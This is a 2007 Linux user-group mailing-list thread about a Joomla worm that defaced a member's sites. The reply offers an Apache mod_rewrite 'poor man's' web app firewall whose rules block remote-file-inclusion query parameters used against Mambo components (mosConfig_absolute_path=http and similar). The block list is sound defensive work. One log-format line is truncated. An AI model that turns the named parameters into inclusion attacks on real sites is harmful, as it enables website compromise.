[Klug-general] A friend got script kiddied...

MacGyveR macgyver at thedumbterminal.co.uk
Wed Nov 28 21:01:32 GMT 2007 

On Wednesday 28 November 2007 17:56, Karl Lattimer wrote:
>
> It happened like this, firstly I started back tracing the logs, most of
> what he did was automated, looks like a joomla worm of some sort. Here's
> the BUT! He made a posting to a forum of a series of domains he'd
> defaced, as people from the forum clicked back trough it left us a click
> trail to follow, right back to his boasting post which we were unable to
> read, however the forum's policy was to display certain contact info
> even in private forums, so we nabbed it there.
>
> Pretty simple really.
>
> This is the third time we've had a joomla worm hit us, and it looks like
> the same exploit had been used on the server on 5 separate occasions by
> 5 different worms, time was where you closed the security whole properly
> behind you so you could continue to use it and nobody noticed, that is
> the essence of ownage.
>
> K,
>
>
>
> _______________________________________________
> Kent mailing list
> Kent at mailman.lug.org.uk
> https://mailman.lug.org.uk/mailman/listinfo/kent

Sounds like a web app firewall is needed, so you can block these kind of 
abnormal requests, try mod_security or even mod_rewrite as a poor man's 
solution (the example below is for mambo but you get the idea):

        #begin app_firewall.conf
        RewriteEngine on
        #stop track and trace
        RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        #block mambo hacks
        RewriteCond     %{THE_REQUEST}  /component.+\.php
        RewriteCond %{QUERY_STRING} mosConfig_absolute_path=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond %{QUERY_STRING} ff_compath=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond     %{THE_REQUEST}  /component.+\.php
        RewriteCond %{QUERY_STRING} sbp=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond     %{THE_REQUEST}  /index2\.php
        RewriteCond %{QUERY_STRING} mosConfig_absolute_path=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        #custom log format with vhost
        CustomLog /usr/local/apache2/logs/appfirewall_log "[%v] %h %l %u %t 
\"%
        #end app_firewall.conf

<VirtualHost www.bla.com:80>
        Include conf/app_firewall.conf
</VirtualHost>

the above is basically a black list, but with mod_security you can implement a 
white list approach.

-- 
--------------------------------
http://www.thedumbterminal.co.uk

More information about the Kent mailing list